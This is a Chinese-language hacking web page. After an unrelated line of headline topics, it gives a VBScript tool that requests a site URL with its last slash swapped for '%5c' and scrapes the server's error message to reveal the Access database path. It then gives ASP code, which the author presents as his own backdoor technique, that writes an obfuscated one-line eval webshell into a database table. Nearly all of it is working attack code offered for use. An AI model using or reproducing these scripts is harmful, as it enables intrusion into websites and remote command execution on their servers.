中共内讧,2001年中美撞机事件,类似小岛惊魂的电影
dim xstatus,tstatus,vserver,vheader,vrsbody
geterror=inputbox("请输入网站,例如:http://www.hackerxfiles.com/files/list.asp?id=415","请输入网址","http://www.hackerxfiles.com/files/list.asp?id=415")
if geterror = "" then
msgbox("输入错误,程序结束!")
wscript.quit
end if
geterror=strreverse(geterror)
tem2=0
for i=1 to len(geterror)
if mid(geterror,i,1) = chr(47) and tem2=0 then
temp=temp & "c5%"
tem2=tem2+1
else
temp=temp & mid(geterror,i,1)
end if
next
geterror=strreverse(temp)
call xmlpost(geterror)
errortext = vserver & " " & xstatus
basesaver = getstr(vrsbody,"找不到文件 '","'。</font>" & chr(10))
if basesaver="[none]" then
basesaver = getstr(vrsbody,"<font face="&chr(34)&"宋体"&chr(34)&" size=2>'","'不是一个有效的路径。")
end if
if basesaver="[none]" then
basesaver = getstr(vrsbody,"打开注册表关键字 '","'。</font>")
end if
if basesaver = "[none]" then
allreturn= "<title>mappath出错获取数据库地址 lilo</title><body scroll='no' bgcolor='menu' style='border:0pt;margin-left:5pt'><b>" & errortext & "</b><br><br><textarea rows='15' name='s1' cols='57'>" &vrsbody& "</textarea>"
else
allreturn= "<title>mappath出错获取数据库地址 lilo</title><body scroll='no' bgcolor='menu' style='border:0pt;margin-left:5pt'><b>" & errortext & "</b><br><br><textarea rows='15' name='s1' cols='57'>" &basesaver& "</textarea>"
end if
call openwin(allreturn)
set whshell = wscript.createobject("wscript.shell")
whshell.appactivate "mappath出错获取数据库地址 lilo"
'whshell.sendkeys ("%{tab}")
set whshell = nothing
function urlencoding(vstrin)
strreturn = ""
for i = 1 to len(vstrin)
thischr = mid(vstrin,i,1)
if abs(asc(thischr)) < &hff then
strreturn = strreturn & thischr
else
innercode = asc(thischr)
if innercode < 0 then
innercode = innercode + &h10000
end if
hight8 = (innercode and &hff00)\ &hff
low8 = innercode and &hff
strreturn = strreturn & "%" & hex(hight8) & "%" & hex(low8)
end if
next
urlencoding = strreturn
end function
function bytes2bstr(vin)
strreturn = ""
for i = 1 to lenb(vin)
thischarcode = ascb(midb(vin,i,1))
if thischarcode < &h80 then
strreturn = strreturn & chr(thischarcode)
else
nextcharcode = ascb(midb(vin,i+1,1))
strreturn = strreturn & chr(clng(thischarcode) * &h100 + cint(nextcharcode))
i = i + 1
end if
next
bytes2bstr = strreturn
end function
function xmlpost(iurl)
on error resume next
ipost=urlencoding(ipost)
set xpost = createobject("microsoft.xmlhttp")
xpost.open "post",iurl,false
xpost.send
xstatus = xpost.status
tstatus = xpost.statustext
vserver = xpost.getresponseheader("server")
vheader = xpost.getallresponseheaders
vrsbody = bytes2bstr(xpost.responsebody)
set xpost = nothing
end function
function getstr(vstring,istring,dstring)
vsum = instr(vrsbody,istring)
if vsum = 0 then getstr="[none]" : exit function
esum = instr(vsum,vrsbody,dstring)
if esum = 0 then getstr="[none]" : exit function
getstr = mid(vrsbody,vsum+len(istring),esum-vsum-len(istring))
end function
function inttostr(vnum,vlen)
if len(vnum) >= vlen then inttostr = vnum : exit function
for i=1 to vlen-len(vnum)
inttostr=inttostr & "0"
next
inttostr = inttostr & cstr(vnum)
end function
function getsplit(unstr,vastr,mode)
atemp = split(unstr,vastr)
btemp = ubound(atemp)
select case mode
case -1: getsplit = atemp
case -2: getsplit = btemp
end select
if mode < 0 then exit function
if mode > btemp then getsplit=false : exit function
if mode >= 0 then getsplit = atemp(mode)
end function
function openwin(vttv)
set ie = wscript.createobject("internetexplorer.application")
ie.navigate "about:blank"
ie.visible = 1
ie.toolbar = 0
ie.statusbar = 0
ie.width=500
ie.height=335
do while (ie.busy): loop
set doc = ie.document
doc.open
execute "doc.writeln " & chr(34) & vttv & chr(34)
doc.close
set ie=nothing
end function
另一个是我写的,向access里插入asp代码来当作后门,这应当是我的首创了,不过我也不知其他人有没有更早提前发现的。后来网上就流传开直接向数据库插入一句话来得到webshell。不知不觉时光飞逝,4年过去了,人老了,难道只能怀旧吗?
<%
db="0123.asp" '这里改成您的数据库地址
set conn=server.createobject("adodb.connection")
connstr="provider=microsoft.jet.oledb.4.0;data source="&server.mappath(db)
conn.open connstr
'添加notdownload表
conn.execute("create table notdownload(notdown oleobject)")
'写入<%数据
set rs=server.createobject("adodb.recordset")
sql="select * from notdownload"
rs.open sql,conn,1,3
rs.addnew
rs("notdown").appendchunk(chrb(asc("<")) & chrb(asc("s")) & chrb(asc("c"))& chrb(asc("r")) & chrb(asc("i"))& chrb(asc("p"))& chrb(asc("t"))& chrb(asc(" "))& chrb(asc("r"))& chrb(asc("u"))& chrb(asc("n"))& chrb(asc("a"))& chrb(asc("t"))& chrb(asc("="))& chrb(asc("s"))& chrb(asc("e"))& chrb(asc("r"))& chrb(asc("v"))& chrb(asc("e"))& chrb(asc("r"))& chrb(asc(" "))& chrb(asc("l"))& chrb(asc("a"))& chrb(asc("n"))& chrb(asc("g"))& chrb(asc("u"))& chrb(asc("a"))& chrb(asc("g"))& chrb(asc("e"))& chrb(asc("="))& chrb(asc("j"))& chrb(asc("a"))& chrb(asc("v"))& chrb(asc("a"))& chrb(asc("s"))& chrb(asc("c"))& chrb(asc("r"))& chrb(asc("i"))& chrb(asc("p"))& chrb(asc("t"))& chrb(asc(">"))& chrb(asc("e"))& chrb(asc("v"))& chrb(asc("a"))& chrb(asc("l"))& chrb(asc("("))& chrb(asc("r"))& chrb(asc("e"))& chrb(asc("q"))& chrb(asc("u"))& chrb(asc("e"))& chrb(asc("s"))& chrb(asc("t"))& chrb(asc("."))& chrb(asc("f"))& chrb(asc("o"))& chrb(asc("r"))& chrb(asc("m"))& chrb(asc("("))& chrb(asc("'"))& chrb(asc("#"))& chrb(asc("'"))& chrb(asc(")"))& chrb(asc("+"))& chrb(asc("'"))& chrb(asc("'"))& chrb(asc(")"))& chrb(asc("<"))& chrb(asc("/"))& chrb(asc("s"))& chrb(asc("c"))& chrb(asc("r"))& chrb(asc("i"))& chrb(asc("p"))& chrb(asc("t"))& chrb(asc(">")))
rs.update
rs.close
set rs=nothing
'关闭连接
conn.close
set conn=nothing
%>
如对本文有疑问,请在下面进行留言讨论,广大热心网友会与你互动!!
点击进行留言回复
我要评论
网友评论